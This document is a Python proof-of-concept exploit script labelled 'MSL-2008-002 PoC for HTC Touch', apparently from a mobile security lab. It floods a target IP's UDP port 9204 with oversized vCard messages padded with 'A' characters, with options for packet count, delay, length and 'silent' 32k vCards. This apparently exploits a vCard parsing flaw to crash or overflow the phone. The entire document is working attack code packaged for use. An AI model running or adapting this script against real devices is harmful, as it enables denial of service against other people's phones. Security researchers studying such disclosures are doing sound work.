#!/usr/bin/env python
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from socket import *
from sys import exit,argv
from time import *
import random
from optparse import OptionParser
# Global Variables
PORT = 9204
DEF_NUM_PACKETS = 10
DEF_VCARD_LEN = 1410
DEF_DELAY = 0.7
VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:"
VCARD_TRAILER = "\r\nEND:VCARD\r\n"
def main():
# Local variables
num_packets = DEF_NUM_PACKETS
delay = DEF_DELAY
print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n"
# Parsing options
parser = OptionParser("usage: %prog [options] target_IP")
parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)")
parser.add_option("-c", "--count", type="int", help="specify vcard length", dest="count")
parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay")
parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len")
parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text")
# Parse input
(options, args) = parser.parse_args()
if len(args) != 1:
parser.print_help()
print ""
exit(1)
if options.count:
num_packets = options.count
if options.delay:
delay = options.delay
if options.silence:
vcard_body = VCARD_HEADER+'A' *32722+VCARD_TRAILER
elif options.len:
vcard_body = VCARD_HEADER+'A' *options.len+VCARD_TRAILER
elif options.text:
vcard_body = VCARD_HEADER+options.text+VCARD_TRAILER
else:
vcard_body = VCARD_HEADER+'A' *DEF_VCARD_LEN+VCARD_TRAILER
# Socket creation
udp_sock = socket(AF_INET, SOCK_DGRAM)
ADDR = (args[0],PORT)
# Start sending packet
counter = 1
c_lap = 0
total_data = 0
print "Sending %d packets... to %s" % (num_packets,ADDR)
start_time = time()
start_lap = time()
# Start sending packet
while counter <= num_packets:
len_sent = udp_sock.sendto(vcard_body,ADDR)
if len_sent != len(vcard_body):
print "Error sending packet n.%d" %counter
break
# Update Counter
counter += 1
c_lap += 1
total_data += len_sent
# Sleep for letting the device parse vcards
sleep(delay)
# Check number of packets in a second
local_lap = time()
if local_lap - start_lap >= 1:
print "%0.2f packets/sec" % (c_lap/(local_lap - start_lap))
start_lap = local_lap
c_lap = 0
stop_time = time()
stop_sec = stop_time - start_time
# Display info
print "Sent %d packets in %f seconds" % (num_packets, stop_sec)
print "Start time: %s" %ctime(start_time)
print "Stop time: %s" %ctime(stop_time)
print "Payload Len = %d bytes" % len(vcard_body)
print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data)/float(1024)))
#Global start
if __name__ == "__main__":
main()
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